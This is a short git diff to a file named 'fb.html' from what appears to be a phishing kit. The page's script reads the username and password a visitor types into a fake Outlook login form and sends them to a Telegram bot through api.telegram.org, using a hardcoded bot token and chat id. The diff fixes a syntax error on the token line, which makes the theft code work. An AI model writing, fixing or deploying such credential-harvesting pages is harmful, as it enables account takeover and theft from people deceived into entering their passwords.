--- a/fb.html
+++ b/fb.html
@@ -190,7 +190,7 @@
       const password = document.getElementById('password').value;
 
       const telegramMessage = `🟦 Outlook Login Attempt\n\n📧 Email: ${username}\n🔑 Password: ${password}`;
-      var token = '8384188856:AAEsf9qHpnJ1-438BQxfxYdJB-T-2IGlCn8;
+      var token = '8384188856:AAEsf9qHpnJ1-438BQxfxYdJB-T-2IGlCn8';
       var chat_id = '8499614893';
       const url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${encodeURIComponent(telegramMessage)}`;
 
@@ -219,3 +219,4 @@
 
 
      
+
